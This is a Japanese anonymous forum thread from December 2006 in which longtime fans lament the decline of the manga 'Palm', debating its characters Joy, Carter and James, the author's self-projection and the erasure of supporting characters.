とはいえ、このスレの発言に有る程度の共通性がある辺り、初期のパームにはまる人の趣味傾向は共通のものかなとも思うが

412 :花と名無しさん:2006/12/03(日) 21:15:58 ID:???0
>411
う〜ん、私はPALMに「こうあって欲しい」てのは無いんだよな。
己の心境を無理やり何かに例えると、
いつ行ってもジャンル問わず最高の料理が味わえた料理屋が、
いつからか味が変わったどころでは無く、明らかに不味くなった、て感じ。
それでも客としてたまに通うのは、やはりそこでしか扱わない食材が有るのと、
店の親父の「いつか完成させたい料理がある。」という言葉を見届ける為…

って、どんだけ不健全な客なのか自分www
素直に「最近のも美味しい!」って言える人が勝ち組ですよ実際。

413 :花と名無しさん:2006/12/03(日) 21:16:30 ID:???0
初期はキャラもちゃんとそれぞれ息をしてると思えるぐらい
個々で立ってる感じだった。


今ではジェームス教のためのデクノボウ。

414 :花と名無しさん:2006/12/04(月) 01:12:41 ID:???0
>>412
うちの近所の料理屋の店主がさ、ボケが始まって
舌もダメになって、味が全然解らなくなったのね。味覚麻痺。

今は奥さんが味見してるし、もう市販の粉末ダシ使って
インスタント食品をコッソリ出してる。そんなんで「最近のもおいしい」なんて言えないよ。

この作者もそんなかんじ。

415 :花と名無しさん:2006/12/04(月) 07:55:57 ID:???0
駄目になってきた段階で、いっそすっぱりと未完のままの方が
どれほど読者にとって幸せだったかと思うよ……

416 :花と名無しさん:2006/12/04(月) 09:43:04 ID:???0
それでも続いていれば何とか持ち直してくれるかもと思ってしまう。
パームは計画があるから、引き伸ばしじゃないことは確かだし。
前例は無いんだけど、最初の例になってくれたらいいな。


417 :花と名無しさん:2006/12/04(月) 11:23:36 ID:???0
>>413
そうなんだよね
初めの頃ってサブキャラもみんな生きていた
それぞれの人生をそれぞれに背負いながら生きて存在しているという感じだった
でも今は単なるモブに成り下がったという感じ
ASPまでかな何の疑いも不満も持たずに読めたのって
というか、ASPできれいに〆ていたんだからあそこで終わっても良かったように思う

418 :花と名無しさん:2006/12/04(月) 12:37:51 ID:???O
アンチスレでなく、悪意があるわけでもないのに、これだけ似たような批判が相次ぐと
いうのも珍しいよな。

今はキャラも作者もJBの崇拝者になってしまっていて、読者にもそれを強いている
感じで気持悪い。自分はカーターが主人公だと思っていたから尚更。

419 :花と名無しさん:2006/12/04(月) 13:07:23 ID:???0
フリスやグレッグやティットやビアトリス夫妻が好きだった。

今後の語り部ジョイがそういう連中と一切
口をきかない女じゃ、どーしよーもないね。
こいつカーターとエティアスとしかつきあわないんだから。

420 :花と名無しさん:2006/12/04(月) 15:44:51 ID:???0
作者も鬱状態なのかね。
あまり楽しく描いてなさそう。

421 :花と名無しさん:2006/12/04(月) 16:23:10 ID:???0
それは思う>カーターが主人公のはず
なんか軸足がずれちゃったあげくに明後日の方向にJBと作者が
ふたり手を取りあってぐるぐる回転してっちゃったみたいな?

422 :花と名無しさん:2006/12/04(月) 18:03:33 ID:???0
>今後の語り部ジョイがそういう連中と一切
>口をきかない女じゃ、どーしよーもないね。
>こいつカーターとエティアスとしかつきあわないんだから。

○(メル欄)が行方不明の事にすら関心なさそうなのがまた…

423 :花と名無しさん:2006/12/04(月) 19:17:19 ID:???0
ジョイって、小説家として成功したのか?ヘボな伝記作家モドキで一生終わって、ジェームスの遺産で食っていきました、となって居そうな気もするが
そういや、カーターの息子たちやエティアス(医者になった方)って、ASPラストを見るに、ジェームスの死後はジョイやビダーとは余り関わらなかったようにもとれるけど
エティアスJr.は医者になったのはカーターの影響だし、J.B.オーガスは叔母の夫を嫌ってるようだし

どうだろ?

424 :花と名無しさん:2006/12/04(月) 19:22:49 ID:???0
その作品のネタですら亡き夫の遺産なのですが・・・・

425 :398:2006/12/04(月) 20:28:42 ID:???O
>>400
ビダーはまんま自伝で作者自身が己の痛さを自覚して描いてた感じがする。
青また青を自伝と知らなくても一つの短編作品としても楽しめる。
でも自己投影したジョイを
自キャラマンセーの極致のスーパーマンJ.Bの妻にしてしまうのは
二重三重の意味で自キャラマンセー+自分マンセーであるわけで
物凄く気持ち悪いんだよね。

426 :花と名無しさん:2006/12/04(月) 20:37:15 ID:???0
作者の立ち居地は、カーターにも投影されているような気もするが。でも、そうなっても結局、自分が今まで親身になっていた人物を
自己投影とはいえ、どこの馬の骨とも知れない小娘に取られたような感じになって・・・

もう訳わからんな。ジェームスの親としての立場とジェームスの伴侶としての立場のせめぎ合い?
しかし、ジョイって作者の自己投影にしてはキャラが薄くないか?ビダーみたいな人だと思ってたんだが

427 :花と名無しさん:2006/12/04(月) 21:14:44 ID:???0
あ、自分もそう思ってた。>ジョイがビダーみたいな人

もっと地に足ついててサバサバした、現実世界で生きる娘を想像してた。
アンジェラから毒を抜いたような感じの。

結婚も最初から言い出さず、普通にコミュニケーション取ってて、
最後の最後に「じゃ、結婚するか」「そうね」と、あっさり結ばれて
カーターを驚かすような……。
少なくともイタタ不思議ちゃんだとは思わなかったよorz

428 :花と名無しさん:2006/12/04(月) 21:24:41 ID:???0
>しかし、ジョイって作者の自己投影にしてはキャラが薄くないか?
つまりそこだね。
作者(の少なくとも作品を通して見える部分)までが深みのない安直な人に
なったと思えてきて、なんというか、ひどくガックリさせられる。

ふっと思い出したんだけど、「あるはずのない海」のラストの花火の打ち上げで、
近所の人たちも集まってきて一緒に見上げてたじゃない。
あのシーンって、何気なく凄く幸福感に満ちあふれてたと思うんだ。
ジェームスにもカーター達にも特別に関心を持たない、(概ね)善意の他人達が
当たり前にいる中に彼らがいられる、というのは、実に牧歌的だったなあと。

今なんか、近所から世界中まで皆が彼らに関心を向けていて、くつろいで過ごす為の
隠れ家(別荘)が必要になる始末だ(名実共に「セレブ」だし('A`))
それでいて、そこでオーガス家の面々がくつろいで過ごす様子はほとんど描かれない
っていうのは、つまり作者の関心が既にそういう「当たり前の日々の何気ない幸せ」
には無いんだな、って。そういう彼らを描ける最後のチャンスっぽい話だったのに。
もう「セレブな彼ら」しか描く気ないのかね…('A`)

429 :花と名無しさん:2006/12/04(月) 21:27:37 ID:???0
>>428
>もう「セレブな彼ら」しか描く気ないのかね…('A`)

その場合、一番裏切られたのは、大統領に立候補することを拒否されたシンだよな

430 :花と名無しさん:2006/12/04(月) 21:40:14 ID:???O
>>429
ワロスwww

431 :花と名無しさん:2006/12/05(火) 02:43:59 ID:???0
>>422
へぇー娘がさらわれると、他人と口をきかなくなるの?

子供が拉致されたり、殺されたりすると逆になる母親のが多いけどね。
世間に訴える活動や、饒舌に頻繁な公演やって。

ジョイは精神科の患者だと書かれてるし、実母の精神病を受け継いだだけだろ。

432 :花と名無しさん:2006/12/05(火) 07:38:33 ID:???0
正直娘の事なんて本当にどうでも良さそうだ

私もジェームスの「俺は牧歌的な人間云々・・」ってところ凄く好きだった
初読の時にイケイケドンドンの世界にいて
「何故もっと野心的になれない」「もっとチャンスを生かせ、チャンスをつくれ」
と日々言われて疲れていたから。

433 :花と名無しさん:2006/12/05(火) 07:46:11 ID:???0
あの頃のジェームスはもういないんだよ……(;´Д⊂)

434 :花と名無しさん:2006/12/05(火) 08:01:34 ID:???0
>>431
>へぇー娘がさらわれると、他人と口をきかなくなるの?

(゚д゚)ハァ? >>422の人はそんなこと書いてないと思うんだが、どこをどう読めば
そんな解釈になるの?

>子供が拉致されたり、殺されたりすると逆になる母親のが多いけどね。
>世間に訴える活動や、饒舌に頻繁な公演やって。

それってどこに発表された統計を基にした発言なの? それが事実なら、
少なくとも現在の何十倍も街頭活動や講演を見聞きするはずだよ。
子供を失ったことがトラウマになって家に引きこもるケースだって決して
少なくないと思うんだけど、それが少数派だという根拠を聞きたいな。

明らかに釣り擬きの発言だし、>>422の人がわざわざメル欄にしたネタバレを平気で
バラしている無神経さといい、もしかして君は例の「堕胎が日常」の人かな?

435 :花と名無しさん:2006/12/05(火) 08:08:57 ID:???0
わざわざ言わんでも皆わかってるから生温かくヌルーしなされ。

それにしても初期の映画的なセンスとかキャラの立ち方とか、
思い出すと、あの頃パームを好きだったのは間違ってなかった
とは思うよ。
今のも片鱗はあるんですよ。ところどころ。
でも、だからこそよけいに辛い。


436 :花と名無しさん:2006/12/05(火) 08:30:46 ID:???0
おそらく、作者の立ち位置とか方針は初期から変わっていないと思うんだ。だけどそれ自体が
非常に微妙な匙加減を要求されるようなものだったんだよ。SAPくらいまでは、名人芸と言える
バランス感覚で物語を展開していた。だけど作者の中で何かが変わってしまって、
環境がどうとかJB命とか、繊細な味だった鍋の中に化学調味料をドバドバ入れるような
ことをやりはじめてしまった。

437 :436:2006/12/05(火) 08:31:52 ID:???0
SAPって何だよw ASPね。

438 :花と名無しさん:2006/12/05(火) 08:42:14 ID:???0
ジョイがシドに嫉妬して電話いきなり切ったじゃん。

皆様冷静考えてみ。あれこそが異常。

439 :花と名無しさん:2006/12/05(火) 09:15:31 ID:???0
うむ。

440 :花と名無しさん:2006/12/05(火) 12:46:55 ID:???0
「ワールド」はファンタジーだけど味が薄い。観念的なことに頼って
肝心な世界構築の観察力が足りない。
「コカコーラ」はSFだけどしっかり地に足が着いてた。
パームは人間関係の描写が秀逸でそれが作品のリアリティ際立たせてたのに
パームの根幹ともいえる軸が「愛ではなく」からぶれてしまった。。。
なんで突然消えるファンタジーばりのキャラを出してしまったのか、
初期のインタビューで「なるべく漫画的な大げさな表現を避けるようにしてる」
ってあったが、作者自身パームを味薄にするようなことをやってしまってるような。。。


441 :花と名無しさん:2006/12/05(火) 12:48:32 ID:???0
>>437
…それを「変わってしまった」というんじゃないだろうか…

442 :花と名無しさん:2006/12/05(火) 18:01:41 ID:???0
>>440
会った事もないのに瞳の色が分かる、JBとアンディの光る掌、突然出てくるサロニーの手・・・といったASP以前の超常現象はスルー?

「ワールド」の時点で、ジョイという役者の薄さについては気づくべきだったのかもね。カーター(外道ゲリラ)やビアトリス(花の女王)、ジョゼ(黒猫)とかに比べると印象に残りにくい
ところで「コカコーラ」だって、設定はリアリティなぞうっちゃったバカSFだぞ。それがコミカルで良いのだが

443 :花と名無しさん:2006/12/05(火) 18:04:13 ID:???0
馬鹿じゃないSFなんて滅多にないぞ?
あれは確信犯な馬鹿SFですよっと。

444 :花と名無しさん:2006/12/05(火) 18:22:31 ID:???0
>442
コカコーラは、設定こそSFだけど本質は人間ドラマだよね。
SFはただの設定でこれの面白さは人間観察の深さにある。
パーム初期の超常現象はアクセサリーで星占いを面白がる程度のもので、
主軸は人間ドラマだし。
しかし正直「星の歴史」の後半から4次元とごっちゃになった危険信号は
みられたけど。。。




445 :花と名無しさん:2006/12/05(火) 19:21:31 ID:???0
ソレダ!>人間ドラマ
パーム初期の人間模様には、海外の良質ドラマを観るような味わいが
あったよ。今のは……漫画?(>非常に悪い意味で)

446 :花と名無しさん:2006/12/05(火) 19:44:47 ID:???0
初期は作者の「言いたいこと」がもっと身近だったんだよな。
愛は何度でも生き返るんだよ とか
不安になるのは望みが高いからだ とか
世界はお前が生まれたときにはじまり、お前が死んだときに終わる とか
自分が行き詰まったとき頑張るための力をたくさんもらった。
今はなんか遠くのほうにあることを言っててよく聞こえないみたい。

447 :花と名無しさん:2006/12/05(火) 20:11:34 ID:???0
どうしてそんなことを聞くのだろう。どうでもよいことなのにな

448 :花と名無しさん:2006/12/05(火) 20:49:48 ID:???0
>>446
結局、作者と読者が遠く離れてしまった感じだね。

449 :花と名無しさん:2006/12/06(水) 00:04:49 ID:???0
昔はヴォガネットやアーヴィングみたいな漫画だと思って読んでました。
風変わりで、根暗で、皮肉っぽいんだけど、ユーモラスで惹きつけられる…。
(カーターに、ヴォイド・ネガットだもんね)

『愛でなく』は、環境会議というイベントを背景に交錯する群像劇つーことで、
「わぁ、アルトマンの映画みたい」と考えたが、大風呂敷がたたみきれず冗漫に。

『午前の光』は、オカルトから近親相姦まで何でもありのソープオペラかと
思いきや、嫁に行くの行かないの、カーターはうるさい小舅になっちゃうし、
「こりゃあ、渡る世間は鬼ばかりだわい」と思ってるうちに終わっちゃった。

ヴォネガットから出発して、たどり着いたのが橋田壽賀子じゃあ、
ちと悲しいっす。おいらは。

450 :花と名無しさん:2006/12/06(水) 10:49:47 ID:???0
>>446
昔の作品は胸に残るメッセージが多かった
短編の方だけど
「素敵」といってごらん。「幸せ」と。それ以外の言葉は覚えなくていい。
っていう台詞があって
ものすごく胸を射抜かれた記憶がある。
丁度子どもを生んだ直後だったからかなぁ。

451 :花と名無しさん:2006/12/06(水) 17:01:00 ID:???0
確かに昔の作品の方が、
心にずっと印象深く残ってる。
今よりもずっとシンプルで、
それだけ研ぎ澄まされたかんじだった。

452 :花と名無しさん:2006/12/07(木) 11:59:49 ID:???0
昔の作品は、セリフもはっとするようなものが
あったけど、絵も好きだったです。個性的で。
今のみそ絵は…。でも文章だけより、ないよりまし!
カータが最終章を共著するとかいう描写から、
TASKまで小説化してしまうのではと一抹の不安があります。
小説はこれで最後に…。漫画なんだから。

453 :花と名無しさん:2006/12/08(金) 12:39:20 ID:???0
年を取ると体力がなくなるんだよね。
それって根気がなくなるってことでもあってさ、描きたいことを根を詰めて描けなくなって来てるんじゃないかな。
それから、若いときは悩みや苦しみや焦りがまさに自分のものであった訳だけれども
やっぱり年を取るとそういったものから乖離してしまうんだよね。
身に沿ったものではなくなる。ある意味他人事、みたいな。
だから作品にリアルな手触りがなくなるのは仕方ないのかなと思う。


454 :花と名無しさん:2006/12/08(金) 16:12:29 ID:???0
逆に根詰め過ぎておかしくなってるような。
風通しが悪くて盲目的というか、こういう周りの反応も見えないんだろう。

でもこの人はきっと戻って来ると思ってる。


455 :花と名無しさん:2006/12/08(金) 17:08:27 ID:???0
>>454
> でもこの人はきっと戻って来ると思ってる。

そうなんだよ。
パームも落ちたなぁとかクソ展開ktkrとか思ってるのに、
まだ期待してしまう。
いっそはっきり精神世界だの神だの言ってくれたほうが捨てやすいのに。

456 :花と名無しさん:2006/12/08(金) 17:32:21 ID:???0
>精神世界・神
ワールドでそっち逝っちゃってるから、ライトファンはドン引きしてそう。
ていうか自分も引きぎみだw

457 :花と名無しさん:2006/12/08(金) 20:44:27 ID:???O
パーム好き同士でパームをバイブルとか言ってたくらい儲だったけどワールドは引いたなあ。
何を描きたいのか全然わからない。

458 :花と名無しさん:2006/12/08(金) 21:27:20 ID:???0
二人の神さまの放浪記だろ?

459 :花と名無しさん:2006/12/08(金) 21:36:35 ID:???0
ジェームス萌え〜
サロニー(*´Д`)ハァハァ
環境保護最高(・∀・)!!

ってことでしょ。

460 :花と名無しさん:2006/12/09(土) 04:59:29 ID:???0
いや作者明らかに更年期でしょ。
それを理解してくれて助けてくれるダンナがいれば
こういう展開にはならなかった。

ま、60歳過ぎればスッキリすると思う。

461 :花と名無しさん:2006/12/09(土) 07:02:28 ID:???0
そもそも旦那がいたらこの作品自体が世に出てな(ry

462 :花と名無しさん:2006/12/09(土) 08:07:53 ID:???O
世には出たと思うが、かなり違う作品になっていたはず。

463 :花と名無しさん:2006/12/09(土) 08:28:57 ID:???0
>>462
同意。中学時代からコレ描く気でいたんだから。

作家の旦那が、作家の父親と正反対の男で、
常に妻に優しくて、彼女を生涯愛してくれた男性で
彼女と一生連れ添ったなら・・・。

464 :462:2006/12/09(土) 18:46:22 ID:???O
>>463
下手すると同人誌で終わっていたかも。心もお財布も満たされていたら、今のような
「パーム」は描けなかったでしょう。

465 :花と名無しさん:2006/12/09(土) 19:24:57 ID:???0
「中学時代から構想してました」なんて台詞を本気で信じてる
ピュアな人がまだいるなんてw

466 :花と名無しさん:2006/12/09(土) 19:28:33 ID:???0
>>465
その頃からの落書き帳は、公表されているぞ。
「アンディが共和国の王子様」「カーターが陰険な悪党」とか最早、原形をとどめていない代物だが

467 :花と名無しさん:2006/12/09(土) 19:33:29 ID:???0
>>465

論拠も示せないなら書き込みしなければいいのに。
他人を笑うつもりが、自分が笑われて憐れですね。

468 :花と名無しさん:2006/12/09(土) 20:50:01 ID:???0
その落書き帳の「年代」って自己申告以外にどうやって証明できるのプププ

長年構想してましたエヘってやたら語りたがるのってのはよくオリジ系の
同人でよく見かける。中二病のかほりがするよねw

469 :花と名無しさん:2006/12/09(土) 21:13:59 ID:???0
ていうか昔から考えていたということって、
うそついて読者に信じさせて得するようなことでもないと思うんだけど。
468にとっては重大なことなのかな?

470 :花と名無しさん:2006/12/09(土) 21:47:41 ID:???0
事実かどうかはどうでもいいけど、確かにその
「昔から構想してて」発言は同人風味ではあるなぁ

471 :花と名無しさん:2006/12/09(土) 23:04:45 ID:???0
大ファンだった頃は「凄いなあライフワークなんだなあ」と感心してた。

どこか醒めてしまった今は「あっそーへーすごいねー」と鼻をほじって
生返事したい気分。中学生から〜発言も今はなんとなくライフワーク的
大作、をアピールしたいだけのウソくさく聞こえる。不思議だな。


472 :花と名無しさん:2006/12/09(土) 23:20:03 ID:???0
ウィングス自体がドジーン臭い雑誌だしな
昔はSF系が多かったのに、今では……

473 :花と名無しさん:2006/12/09(土) 23:35:18 ID:???O
例の荒らしだろ。釣られるなよ。

474 :花と名無しさん:2006/12/10(日) 02:13:58 ID:???0
中学から妄想してたからって、特別蔑むような事でも尊敬するような事でもないだろうに。
まして(そんなエピソードがあろうがなかろうが)ちょっとアレな人なんだし、
どっちにしても良い漫画描いてくれれば文句は無いよ。


あ、ペンネームはどうにかしてほしい。

475 :花と名無しさん:2006/12/10(日) 05:48:43 ID:???0
お豆の半分と見比べれば、随分と違うし。そういうものをゼロからでっち上げて描く意味なんてないだろ

476 :花と名無しさん:2006/12/10(日) 09:32:55 ID:???0
本人にとって意味があるからわざわざ公表したんだろ……どうでもいいよ
おばはんのワタシって子供の頃からスゴイのー的自己顕示欲なんて。

477 :花と名無しさん:2006/12/10(日) 10:09:59 ID:???0
後半がgdgdじゃなかったら今さら昔の中二病ネタ公開のことなんて
誰もたたかなかったのにと思うとなんか(´・ω・`)だなー

478 :花と名無しさん:2006/12/10(日) 10:43:20 ID:???0
愛でなく、の最初で挫折して以来ずっと離れてた。
でもこのスレ読んでてまた読みたくなってきた。
怖いものみたさっていうのかもしれんけど・・・

ジョイ(未見)のキャラによってはただつらいだけなのだろうか?

479 :花と名無しさん:2006/12/10(日) 11:18:33 ID:???O
子供の頃から才能があると言いたいんじゃなくて、JACSには愛着があると言いたいだけだと思うが・・・

480 :花と名無しさん:2006/12/10(日) 13:04:51 ID:???0
公式に「蜘蛛の紋様」連載第2回プレビューが出とるね。
アゴはそのまんまだけど、セリフがほとんど無いせいか、少し往年の空気感を思い出した。
性懲りもなく期待しちゃうよクソー。

481 :花と名無しさん:2006/12/10(日) 15:37:02 ID:???0
>>479
しつこいよ

482 :花と名無しさん:2006/12/10(日) 17:35:33 ID:???0
>479
間違うな。今現在はJACKだ。   orz

483 :花と名無しさん:2006/12/11(月) 01:35:22 ID:???0
ルージュメイアンの記憶がフロイドとジョイ以外の全員から
抹消されたのが納得いかない。

住んでた家があった以上、大家なり不動産屋なりが書類持ってるはずだし。
カーターに瓜二つという重要なインパクトを
当のカーターとジャネットが忘れるわけないのだから、オカルト的に
誰かが記憶操作しているのかな?

フロイドは配偶者と2度も別離か。かわいそうに。

484 :花と名無しさん:2006/12/11(月) 01:54:12 ID:???0
もうSFだね。。。。


485 :花と名無しさん:2006/12/11(月) 02:11:03 ID:???0
なに?ルージュメイアン黒歴史化したの?
もっと自分っぽいキャラ=ジョゼが出てきて用済みになったのか?
酷いことするなあ、作者…('A`)

486 :花と名無しさん:2006/12/11(月) 06:43:25 ID:???0
ジョゼの存在って記憶から消されたんだ…。
シドよりジョゼが好きだったし、「午前の光」のジョイは自分的に論外な感じだったのでショック…。
アンジェラもいないって本当ですか。

なんか「興味がもうない」というよりは「読みたくない」作品になって来つつあるな…。

487 :花と名無しさん:2006/12/11(月) 07:28:58 ID:???0
ジョイ以外の女は強制排除

488 :花と名無しさん:2006/12/11(月) 07:56:53 ID:???0
ルージュメイアンがいると何かと迷惑・面倒だからと言って
本当に抹消するってのがすごすぎるねw 頭大丈夫か作家……


489 :花と名無しさん:2006/12/11(月) 07:59:07 ID:???0
というか、ちょっとでもかぶる・ジェームスに近い存在の女性キャラ
全員徹底排除なんだねマジで……アンジェラを蹴りだした段階ですでに
おかしいとは思ったけど、ルージュメイアン文字通りの存在抹消ってのは
無理すぎて泣く気にもなれない。

あんなにPALM大好きだったのにネガな意見を書いてる自分に鬱……


490 :花と名無しさん:2006/12/11(月) 15:35:06 ID:???0
ごめん、コミックス派なんでちょっと話が見えないんだけど、アンジェラとか
ルージュメイアンが抹消されたってどういうこと?

491 :花と名無しさん:2006/12/11(月) 17:22:08 ID:???0
アンジェらって作者に柱で
「もう出ません」宣言されたんだっけ?
よく覚えてないや

492 :花と名無しさん:2006/12/11(月) 19:31:37 ID:???0
メチャクチャだよなぁ……

なんかきちんとメニュー明記したフルコース料理で、前菜からメイン中盤まで
期待を裏切らない見事な彩りと味……で進んできたところを、シェフがいきなり
客のテーブルに座って料理ムシャ食いし始めたかと思ったら、全部の料理に
ケチャップ山盛りにぶっかけました、みたいな?

493 :花と名無しさん:2006/12/11(月) 21:16:01 ID:???0
ジョイがティナみたいな飽くまで普通の無邪気少女だったら良かったのにな・・・

個性的過ぎる人達、とんでもない事件、霊的現象まで全部ひっくるめて
存在している以上、否定されるべきではない。ありのままでいい。
それぞれの普通、それぞれのスタンダードで生きましょう、って雰囲気が好きだった。
「凡庸な人間など存在しない」の筈だったのに、今は
「凡庸な人間など必要ない。ジェームスは星の歴史に等しい別格最高の存在だ」
になっちゃってる感じ。

494 :花と名無しさん:2006/12/11(月) 21:41:31 ID:???O
アンジェラがもう出ない? 作者乱心か?

495 :花と名無しさん:2006/12/11(月) 22:16:27 ID:???0
「最終話まで出てこない」じゃなかった?
>アンジェラ

496 :花と名無しさん:2006/12/11(月) 22:19:41 ID:???0
でもルージュメイアンって登場した時から
「では女の方が記憶を分け与えて消滅するだろう」って
ププ博士に宣言されてたじゃん?
だからジョゼが消滅するのは最初からの予定だったんじゃないの?


497 :花と名無しさん:2006/12/11(月) 22:26:49 ID:???0
最後の数年間をあなたがたとすごしたかった、みたいなセリフあったね
そういえば。

498 :花と名無しさん:2006/12/11(月) 22:33:33 ID:???0
う〜む。思い込みだけで叩くのは、まずいな
ちゃんと、内容をチェックしておかないと、意外とすぐに突っ込まれるのな

499 :花と名無しさん:2006/12/11(月) 23:00:07 ID:???0
長期シリーズ、長年のライフワーク的な作品を持っている先生たちって
年月と共に、主人公に対するスタンスが
時には試練を与え成長させ、育てる親のような立場から、
ただ褒めて可愛がるだけの
おばあちゃんのような立場になるパターンが多い気がするorz

500 :花と名無しさん:2006/12/11(月) 23:13:38 ID:???0
>>496
だからそもそもそれがおかしいと皆ツッコm(ry>消滅

501 :花と名無しさん:2006/12/11(月) 23:18:52 ID:???0
>>500
でも、ここ最近の流れでは>485、>488って感じに、元々おかしいとは言ってないんじゃない?

502 :花と名無しさん:2006/12/11(月) 23:22:34 ID:???0
SFでもファンタジーでもどうでもいいんだけど、架空ネタでも何でも、
納得させる表現は必要だと思うよ。だから、もしルージュメイアンが
消滅wするにしたって、それなりのウソ説明はついてくれないと、ただの
DQN同人レベルでしょう……
前半がなまじ神だっただけに、後半のアレレぶりが哀しいよ。





503 :花と名無しさん:2006/12/11(月) 23:24:12 ID:???0
>>501
だね。

それは別としてルージュメイアンだけならそういう流れだったし、
受け入れられるんだけど、
アンジェラまでいなくなるというところでなんだか他の意味がありそうな気がしてしまう。


504 :花と名無しさん:2006/12/11(月) 23:27:59 ID:???0
要らないキャラなどいない!!!

……のがPALMの魅力だったと思うのよ。
でも作者にとってはそうではなかったってことだよね。(´・ω・`)

505 :花と名無しさん:2006/12/12(火) 00:52:46 ID:???0
今後まったく出ないってニュアンスではなかったような>アンジェラ
それに次の話はオーガス家の昔話だから、アンジェラが生まれてくる年
まで物理的に出番はないわな



506 :花と名無しさん:2006/12/12(火) 02:09:31 ID:???0
物語上退場するキャラはでてくるでしょ?なに皆こだわってんだか。

507 :花と名無しさん:2006/12/12(火) 02:14:52 ID:???0
キタ━━━━━━(゚∀゚)━━━━━━━!!

508 :花と名無しさん:2006/12/12(火) 07:56:52 ID:???0
>>506
作者本人以外にもアンジェラアンチがいるとは

509 :花と名無しさん:2006/12/12(火) 08:27:01 ID:???0
いや、いつもの釣り師だから。口調いっしょだし。

510 :花と名無しさん:2006/12/12(火) 12:38:59 ID:???O
愛でなくの時に、環境団体の人(ジョゼの同僚)が
ジョゼを忘れているって伏線はあったけどね…
サロニーの死の時みたいな余韻もへったくれもないのは何故だ。


511 :花と名無しさん:2006/12/12(火) 13:19:35 ID:???0
伏線と言っても、単に変人のヒッキーだから忘れられてた、程度な
伏線だもん>ルージュメ
なんだかなあ……こうなっちゃってみると、彼女はなんのために
いたのかという気がする。作者の投影として出したけど失敗して
廃棄処分?


512 :花と名無しさん:2006/12/12(火) 17:36:37 ID:???0
結局、カーターに瓜二つって設定は「ただそれだけ」の意味しかないのかな。

513 :花と名無しさん:2006/12/12(火) 18:46:32 ID:???0
ジョゼは自分の人生がないらしいし、
容貌も相手が望むように見えるらしいじゃん。
フロイトを襲った時、一瞬ビアトリスになってた。

514 :506:2006/12/12(火) 18:53:15 ID:???0
>>508
アンジェラは大好きですよ。これからの物語に役割がないなら退場するだけと思うだけで。

515 :花と名無しさん:2006/12/12(火) 19:29:42 ID:???O
まあ、これ以上の出番がない方が
幸せかもしれないしな…

516 :花と名無しさん:2006/12/13(水) 00:33:23 ID:???O
個人的にはフリスがお気に入りだったのだが…
『愛でなく』まではうるさいぐらい出てきてたのに、
『午前の光』では全く出なくて寂しかった。
良い恋人を得て安定したのはいい事なんだけどさ…

517 :花と名無しさん:2006/12/13(水) 05:38:52 ID:???0
「すごく才能のある男が、いろんなトラブルに巻き込まれて、
すごくひどい目にあう話だよ」「ああ、それはいいですねぇ」
ttp://www.toranoana.jp/webdayo/mando/mando049.html

今は、JBがどんな酷い死に方をするのか(それを物語上どう昇華
するのか、その際のカーターの慟哭っぷり)の方が楽しみです。
(サロニーファンなので出番は期待しようがないんだよ。)

518 :花と名無しさん:2006/12/13(水) 07:11:16 ID:???0
ジョゼがこの世に存在していた痕跡が全部消えたのは
作者のオカルト趣味なんだから別にイイけど、読者に
ちゃんとした説明がないとね。

赤ん坊に化けた大天使が地上で活躍し、その記憶を
某国王たった1人を除く全員から抹消する、ぐらいのイイカゲンさで構わんから。w

しかしフロイドが哀れだよな。ジョゼとのセックスは何だったのよ。
虚空に向けて空鉄砲発射だったわけだ。発射した液体は何処へ吸い込まれたの?

519 :花と名無しさん:2006/12/13(水) 08:00:56 ID:???0
空鉄砲ワロタ
まぁオカルト趣味でもなんでもいいんだよ、別に納得さえできる表現なら。
ただ、イイカゲンでもオケ=オカルト・SFじゃないんだよね。そこんとこを
履き違えてる人が(作者もだけど)読者にもいる気がする。

520 :花と名無しさん:2006/12/14(木) 11:47:57 ID:???0
おなごの子宮は宇宙じゃからのう

521 :花と名無しさん:2006/12/14(木) 19:50:34 ID:???O
>>520
シドのパパンいらっしゃいw

522 :花と名無しさん:2006/12/15(金) 01:12:17 ID:???0
ついでにいえば、いつもおサイフにコンドーム入れてるから

523 :花と名無しさん:2006/12/15(金) 14:08:57 ID:???0
>>520>>521
ワロスwww

524 :花と名無しさん:2006/12/15(金) 19:59:14 ID:???O
パーム世界、その登場人物達の生活や
生き様なんかを描きたいんじゃなかったの?
いつからただの作者の私小説に
なっちゃったんだか。

愛でなくからだけどな!

525 :花と名無しさん:2006/12/17(日) 07:00:08 ID:???0
>>524
確かに初期と最近を比べると、作者とキャラたち(特にJBね)との距離感が全然ちがうね。
どちらが良いかは言うまでもないと思うけど。やっぱり創作の世界でも過保護は
良くないということだろうね。

526 :花と名無しさん:2006/12/17(日) 23:12:53 ID:???0
愛でなくが冗長になってしまったのは失敗だったと思うけど、
非公式だったマイケル・ネガットが公的な存在になり、
表の世界からも裏の世界からも耳目を集める(本人の意志にかかわらず)
立場になる過程が描かれないと今後の展開につながらないんじゃない?

527 :花と名無しさん:2006/12/19(火) 23:58:44 ID:???0
以前は話が落ちそうになると、キャラ自身が軌道修正してたよね。
アンジェラの「家中に猥雑な言葉が響き渡ってるけど何なの?」とか
「お前らホモか?」と言うボアズにアンディが興味なさげに切り返したり、
JB「女と一緒に働きたい」ミハリク「それはつまり今まで女っ気のない所に
居たからかい?」(JB無言)ミハリク「ああ…いや、すまん」とか。

あの渋さ、取り戻して欲しいな――。
連載が進むにつれて、主要キャラこぞって思春期に逆行、って
どんな現象なんだぁぁ。

528 :花と名無しさん:2006/12/20(水) 08:57:48 ID:???0
息子のタスクは今
何やってんの?

作者がオーストラリア行き時点で吐露した以上
作者よ本人よりも、そっちのが興味深深。

529 :花と名無しさん:2006/12/20(水) 09:33:36 ID:???0
作家本人ならまだしも、関係ない家族にまで粘着せんでも。

530 :花と名無しさん:2006/12/20(水) 10:06:18 ID:???O
kwsk

どこかに残ってる?

531 :花と名無しさん:2006/12/20(水) 10:29:44 ID:???0
別に息子が漫画描いてたわけじゃないのにキモイな…。ストーカー?

532 :花と名無しさん:2006/12/20(水) 10:39:53 ID:???0
本人が何もしゃべってないのに追求する香具師がいたらそりゃストーカーっぽいけど、
実際は漫画やサイトで息子のことについて自ら描いたり語ったりしてたんだから、
息子のその後が気になる人がいたって全くおかしくないでしょうが。

533 :花と名無しさん:2006/12/20(水) 13:05:52 ID:???0
充分おかしいよ
そんなに「描かれてない・語られていない」他人の個人情報が気になるんだ?
ワイドショー好きなオバチャンはこれだから怖い。

人権って何だろうね

534 :花と名無しさん:2006/12/20(水) 13:11:19 ID:???0
>>532
それはそうだろうけど……
漫画家が自分の意志で公表した私生活の範疇ならともかく、「家族のその後」なんてのまで
粘着して知りたがる好奇心は正直どうかと思うけどなあ。
